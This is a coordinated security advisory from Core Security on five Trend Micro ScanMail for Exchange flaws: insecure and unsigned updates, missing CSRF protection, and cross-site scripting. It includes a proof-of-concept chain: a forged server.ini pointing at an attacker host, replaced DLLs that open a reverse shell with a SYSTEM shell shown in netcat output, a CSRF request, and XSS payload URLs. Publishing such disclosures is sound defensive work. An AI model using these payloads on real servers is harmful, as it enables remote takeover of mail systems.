Trend Micro ScanMail for Microsoft Exchange Multiple Vulnerabilities

1. Advisory Information

Title: Trend Micro ScanMail for Microsoft Exchange Multiple Vulnerabilities
Advisory ID: CORE-2017-0007
Advisory URL: https://www.coresecurity.com/core-labs/advisories/trend-micro-scanmail-for-microsoft-exchange-multiple-vulnerabilities
Date published: 2017-10-26
Date of last update: 2017-10-26
Vendors contacted: Trend Micro
Release mode: Coordinated release

2. Vulnerability Information

Class: Cleartext Transmission of Sensitive Information [CWE-319], Insufficient Verification of Data Authenticity [CWE-345], Cross-Site Request Forgery [CWE-352], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2017-14090, CVE-2017-14091, CVE-2017-14092, CVE-2017-14093, CVE-2017-14093

3. Vulnerability Description

Trend Micro's website states that:

ScanMail [1] protects Exchange Server 2016, Exchange Server 2013, and Exchange Server 2010. Use the ScanMail installation program to quickly install ScanMail to one or more, local or remote, Exchange servers. Once installed, ScanMail can protect your servers in real time against viruses/malware, Trojans, worms, and spyware/grayware. ScanMail sustains business and network integrity by screening out spam messages and messages containing undesirable or unwanted content. ScanMail monitors and protects sensitive information that is travelling across your network.

Vulnerabilities were found in the ScanMail for Exchange update mechanism and the Web-based console that is bundled with the product, allowing remote code execution as SYSTEM.

4. Vulnerable Packages

• Trend Micro ScanMail for Microsoft Exchange 12 Service Pack 1 (Patch 1 1727)

Other products and versions might be affected, but they were not tested.

5. Vendor Information, Solutions and Workarounds

Trend Micro published the following Security Notes:

• Trend Micro Security Patches CP1755 and HFB1767

 

6. Credits

These vulnerabilities were discovered and researched by Leandro Barragan and Maximiliano Vidal from Core Security Consulting Services. The publication of this advisory was coordinated by Alberto Solino from Core Advisories Team.

7. Technical Description / Proof of Concept Code

Trend Micro ScanMail for Exchange uses an insecure update mechanism that would allow an attacker to overwrite sensitive files, including binaries, and achieve remote code execution as SYSTEM.

This vulnerability is triggered when the update packages are downloaded from alternative sources instead of the ActiveUpdate servers. This functionality can be configured from the Web-based console. By exploiting vulnerabilities 7.3, 7.4, or 7.5, an attacker would be able to set an arbitrary download source and trigger the vulnerable update mechanism.

The vulnerabilities presented in sections 7.1 and 7.2 describe how an attacker could create a malicious update file to overwrite sensitive files and gain SYSTEM access.

7.1. Insecure Update via HTTP

[CVE-2017-14090] Communication to the update servers is unencrypted.

The application attempts to download a zip file named ini_xml.zip, which contains a server.ini file that describes from where to download engine updates, signatures, etc., as well as some metadata of each file.

Additional updates are also downloaded via HTTP by default.

This means that the product does not do any kind of certificate validation or public key pinning, which makes it easier for an attacker to eavesdrop and tamper the data.

7.2. Unvalidated Software Updates When Downloading from Alternative Sources

[CVE-2017-14091] Update packages are signed and checked when they are downloaded from the ActiveUpdate server. However, the application allows users to configure alternative download sources to retrieve the packages.

These packages are not signed or validated in any form other than matching the expected size described in the server.ini file.

An attacker can overwrite sensitive files in the ScanMail's directory, including DLLs. Some interesting examples are the vsapi64.dll and BPMNT.dll files, which result in code execution in the context of the application, which is running with SYSTEM privileges.

The following is a proof of concept to demonstrate the vulnerability:

Create two DLL files that will open a reverse shell connection to the attacker's machine. Name these files vsapi64.dll and BPMNT.dll and place them in a zip archive named engv_x64dll_v9999-1004.zip.

Create the fake server.ini file with the following contents. Note that the size field should match the zip file size.

 ; ======================================= ; ActiveUpdate 1.2 US ; Last modified by AUPD01 
04/11/2017 ; ======================================= [Common] Version=1.3 CertExpireDate=Jul 
28 08:52:40 2019 GMT [Server] AvailableServer=1 Server.1=http://<attackerIP> AltServer=http://<attackerIP> 
Https=http://<attackerIP> [ENGINE] E.20000100=VSAPI_X64_DLL,engine/engv_x64dll_v9999-1004.zip,9.999.1004,2740,
6.510.1002 E.48000126=ATSE_X64_DLL,engine/atse64_win64_v9867-1014.zip,9.867.1014,1676594,6.510.1002 

The next time an update is launched, our file will be downloaded and the DLLs overwritten.

 $ nc -lvp 9999 Listening on [0.0.0.0] (family 0, port 9999) Connection from [192.168.1.111] 
port 9999 [tcp/*] accepted (family 2, sport 55111) Microsoft Windows [Version 6.1.7601] Copyright 
(c) 2009 Microsoft Corporation. All rights reserved. C:\Program Files\Trend Micro\Smex>whoami nt authority\system 

7.3. Lack of Cross-Site Request Forgery Protection

[CVE-2017-14092] There are no Anti-CSRF tokens in any forms on the web interface. This would allow an attacker to submit authenticated requests when an authenticated user browses an attacker-controlled domain.

Proof of concept request to set the update server to an arbitrary source:

 POST /smex/cgiDispatcher.exe?Page=updates/Source.htm&Locale=&CurPage= HTTP/1.1 Host: 
server:16372 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) 
Gecko/20100101 Firefox/53.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,
*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded 
Content-Length: 172 Cookie: AccountCookie=0; asImportInit=initial; page=VirusScan; 
currenttag=Target; TemplateImportInit=initial; session=spJi3es456TqFWSx053UgA; key=2079230218296;
 stamp=15023645 Connection: close Upgrade-Insecure-Requests: 1 txtUpdateFrom=updates%2FManual.htm
&IsPwdChanged=false&txtEncryptedPwd=&optSourceType=alternative_au_server_checked&txtOtherSource=http
%3A%2F%2Fattacker&FormAction=Save 

7.4. Cross-Site Scripting in the Logs Query Page

[CVE-2017-14093] The following parameters of the logs query page are vulnerable to cross-site-scripting: optRemoteLog, optVirusSubType, txtDateFrom, txtDateTo.

The following is a proof of concept to demonstrate the vulnerability:

 http://<serverIP>:16372/smex/cgiDispatcher.exe?Page=logs\Query.htm&Locale=&CurPage=&txt
TargetPage=&optRemoteLog=rggca%22%3e%3cscript%3ealert(1)%3c%2fscript%3ejq25cuwjjyv&txt
DateFrom=05%2F26%2F2017+13%3A36&txtDateTo=05%2F27%2F2017+13%3A36&txtServerGroupIndex=&txt
DateFrom_display=5%2F26%2F2017&optHourFrom=13&optMinuteFrom=36&txtDateTo_display=5%2F27%2F
2017&optHourTo=13&optMinuteTo=36&optType=VirusScan&optVirusSubType=All&optDDASubType=All&opt
WTPSubType=All&txtIpAddress=&chkLogType=0&lstEventType=1%2C2%2C3&txtDescription=&lstSourceType
=1%2C2%2C3&txtKeyword=&optStatusType=All&txtKeywordFoundin=&txtKeywordSender=&txtKeyword
Recipient=&txtKeywordSubject=&txtKeywordFilename=&txtKeywordFilenameOrURL=&optSort=filter_
scan_time&optSortType=1&txtNumPerPage=15&optServer=Current+Server&txtPageNum=0 

7.5. Cross-Site Scripting in the Quarantine Query Page

[CVE-2017-14093] The following parameters of the quarantine query page are vulnerable to cross-site-scripting: optReasons, optRemoteLog, txtDateFrom, txtDateTo.

The following is a proof of concept to demonstrate the vulnerability:

 http://<serverIP>:16372/smex/cgiDispatcher.exe?Page=quarantine\Query.htm&Locale=&CurPage
=&optRemoteLog=&txtDateFrom=05%2F26%2F2017+13%3A36&txtDateTo=05%2F27%2F2017+13%3A36&txtServer
GroupIndex=&txtDateFrom_display=5%2F26%2F2017&optHourFrom=13&optMinuteFrom=36&txtDateTo_display
=5%2F27%2F2017&optHourTo=13&optMinuteTo=36&optReasons=0jw2cy%22%3e%3cscript%3ealert(1)%3c%2f
script%3et6l08en92ns&optResend=0&txtSender=&txtRecipient=&txtSubject=&optSort=filter_scan_time
&optSortType=1&txtNumPerPage=15&optServer=Current+Server&txtPageNum=&txtPageNum2= 

8. Report Timeline

• 2017-07-10: Core Security sent an initial notification to Trend Micro, including a draft advisory.
• 2017-07-10: Trend Micro confirmed reception of advisory and informed they will submit it to the relevant technical team for validation and replication.
• 2017-07-24: Trend micro said one of the reported vulnerabilities should be patch with SMEX 12 SP1 Patch 1. Also said they are in the process of creating the official patch for the remaining ones.
• 2017-07-31: Core Security thanked the clarification and asked for the official download link for SMEX 12 SP1 Patch 1.
• 2017-07-31: Trend Micro provided the download link for SMEX 12 SP1 Patch 1.
• 2017-08-01: Core Security sent back the updated advisory based on our testing of SMEX 12 SP1 Patch 1.
• 2017-08-03: Trend Micro informed the availability of a patch for the reported vulnerabilities just for the English version. They are still in the process of localizing the build of other regions
• 2017-08-10: Trend Micro informed they are still working on the JP fix that would address the vulnerabilities reported. Trend Micro is proposing target disclosure date to be September 26th.
• 2017-08-16: Core Security thanked for the update and asked for the download link of the English fix in order to verify remediation.
• 2017-08-23: Core Security asked if the patch to be release is taking into account the clarifications sent by us at 08/01.
• 2017-08-24: Trend Micro thanked our feedback and said they will review our updated advisory and will get back to us.
• 2017-09-12: Core Security asked if Trend Micro reviewed our clarifications sent by us at 08/01 since we're approaching the release date and we're not sure a fix for that vulnerability is in place.
• 2017-09-12: Trend Micro informed they are in the midst of discussing a solution for this issue and would like to delay the release date in order to address this vulnerability. They said they could share a timeline within a week.
• 2017-09-13: Core Security answered back agreeing in delaying the release date and expecting to get an answer within a week.
• 2017-09-26: Trend Micro informed the availability of a new patch (1755) with the remaining vulnerability fixed. Localized builds and release date are still pending and will let us know as soon as possible.
• 2017-10-11: Trend Micro informed they are ready for publication and proposed the release date to be October 18th.
• 2017-10-12: Core Security thanked the update and answered saying our proposed date for release is October 25th pending confirmation from our internal teams. Core Security will be confirming in the following days.
• 2017-10-18: Core Security confirmed release date to be October 26th / 12pm EST. Asked Trend Micro for their confirmation.
• 2017-10-20: Trend Micro agreed on our proposed release date.
• 2017-10-26: Advisory CORE-2017-0007 published.

 

9. References

[1] https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/scanmail-for-exchange.html

10. About CoreLabs

CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: https://www.coresecurity.com/core-labs

11. About Core Security

Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.

Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia.

12. Disclaimer

The contents of this advisory are copyright (c) 2017 Core Security and (c) 2017 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/